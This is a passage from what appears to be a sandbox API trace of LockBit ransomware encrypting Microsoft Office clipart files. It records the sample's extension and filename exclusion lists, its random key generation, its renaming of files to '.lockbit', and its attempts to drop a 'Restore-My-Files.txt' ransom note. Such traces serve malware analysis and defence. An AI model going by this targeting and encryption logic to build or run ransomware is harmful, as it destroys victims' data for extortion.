returned -1 [0150.570] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.570] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.570] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.570] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.570] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0199279.WMF") returned 1 [0150.570] lstrcmpiW (lpString1="ntldr", lpString2="J0199279.WMF") returned 1 [0150.570] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0199279.WMF") returned 1 [0150.570] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0199279.WMF") returned -1 [0150.570] lstrcmpiW (lpString1="autorun.inf", lpString2="J0199279.WMF") returned -1 [0150.570] lstrcmpiW (lpString1="thumbs.db", lpString2="J0199279.WMF") returned 1 [0150.570] lstrcmpiW (lpString1="iconcache.db", lpString2="J0199279.WMF") returned -1 [0150.570] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.570] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199279.WMF") returned=".WMF" [0150.570] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.570] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.570] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.570] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.571] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.571] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.571] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.571] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.571] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.571] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.571] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.571] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.571] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.571] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.571] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.571] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.571] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.571] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.571] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.571] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.571] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.571] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.571] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.571] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.571] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.571] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.571] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.571] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.572] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199279.WMF.lockbit") returned 72 [0150.572] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199279.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199279.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0150.573] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.573] malloc (_Size=0x40068) returned 0x3df0008 [0150.573] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=29006) returned 1 [0150.573] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.573] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.574] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0150.574] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.574] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.574] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0150.574] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.581] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199279.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199279.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.581] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.582] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0150.583] free (_Block=0x1fa2ed8) [0150.583] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199279.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.583] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.583] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.583] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5655cfd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7c4e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0199303.WMF", cAlternateFileName="")) returned 1 [0150.583] lstrcmpiW (lpString1=".", lpString2="J0199303.WMF") returned -1 [0150.583] lstrcmpiW (lpString1="..", lpString2="J0199303.WMF") returned -1 [0150.584] PathFindExtensionW (pszPath="J0199303.WMF") returned=".WMF" [0150.584] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.584] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.584] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.584] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.584] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.584] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.584] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.584] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.584] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.584] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.584] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.584] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.584] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.584] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.584] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.584] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.584] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.584] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.584] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.584] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.584] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.584] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.584] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.584] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.585] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.585] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.585] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.585] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.585] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.585] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.585] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.585] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.585] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.585] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.585] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.585] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.585] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.585] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.585] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.585] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.585] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.585] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.585] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.585] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.585] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.585] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.585] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.586] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0199303.WMF") returned 1 [0150.586] lstrcmpiW (lpString1="ntldr", lpString2="J0199303.WMF") returned 1 [0150.586] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0199303.WMF") returned 1 [0150.586] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0199303.WMF") returned -1 [0150.586] lstrcmpiW (lpString1="autorun.inf", lpString2="J0199303.WMF") returned -1 [0150.586] lstrcmpiW (lpString1="thumbs.db", lpString2="J0199303.WMF") returned 1 [0150.586] lstrcmpiW (lpString1="iconcache.db", lpString2="J0199303.WMF") returned -1 [0150.586] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.586] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199303.WMF") returned=".WMF" [0150.586] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.586] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.586] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.586] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.586] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.586] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.586] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.586] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.586] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.586] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.586] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.586] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.586] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.586] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.586] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.586] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.586] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.587] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.587] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.587] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.587] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.587] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.587] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.587] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.587] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.587] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.587] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.587] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.587] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199303.WMF.lockbit") returned 72 [0150.587] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199303.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199303.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0150.589] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.589] malloc (_Size=0x40068) returned 0x3df0008 [0150.589] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=31822) returned 1 [0150.589] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.590] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0150.590] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.590] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0150.590] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.596] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199303.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199303.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.596] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.597] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.599] free (_Block=0x1fa2ed8) [0150.599] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199303.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.599] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.599] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.599] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66031e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xc37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0199307.WMF", cAlternateFileName="")) returned 1 [0150.599] lstrcmpiW (lpString1=".", lpString2="J0199307.WMF") returned -1 [0150.599] lstrcmpiW (lpString1="..", lpString2="J0199307.WMF") returned -1 [0150.599] PathFindExtensionW (pszPath="J0199307.WMF") returned=".WMF" [0150.599] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.599] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.599] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.600] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.600] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.600] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.600] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.600] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.600] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.600] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.600] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.600] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.600] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.600] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.600] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.600] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.600] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.600] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.600] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.600] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.600] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.600] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.600] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.600] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.601] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.601] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.601] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.601] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.601] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.601] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.601] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.601] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.601] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.601] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.601] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.601] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.601] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.601] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.601] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.601] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.601] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.601] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.601] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.601] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.601] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.602] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.602] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.602] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0199307.WMF") returned 1 [0150.602] lstrcmpiW (lpString1="ntldr", lpString2="J0199307.WMF") returned 1 [0150.602] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0199307.WMF") returned 1 [0150.602] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0199307.WMF") returned -1 [0150.602] lstrcmpiW (lpString1="autorun.inf", lpString2="J0199307.WMF") returned -1 [0150.602] lstrcmpiW (lpString1="thumbs.db", lpString2="J0199307.WMF") returned 1 [0150.602] lstrcmpiW (lpString1="iconcache.db", lpString2="J0199307.WMF") returned -1 [0150.602] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.602] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199307.WMF") returned=".WMF" [0150.602] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.602] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.602] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.602] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.602] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.602] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.602] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.602] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.602] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.602] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.602] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.603] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.603] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.603] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.603] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.603] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.603] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.603] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.603] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.603] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.603] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.603] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.603] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.603] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.603] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.603] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.603] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.603] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.603] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199307.WMF.lockbit") returned 72 [0150.603] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199307.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199307.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0150.605] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.605] malloc (_Size=0x40068) returned 0x3df0008 [0150.605] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=50046) returned 1 [0150.605] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.605] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0150.605] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.606] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0150.606] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.611] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199307.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199307.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.611] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.611] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.614] free (_Block=0x1fa2ed8) [0150.614] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199307.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.614] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.614] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.614] FindNextFileW 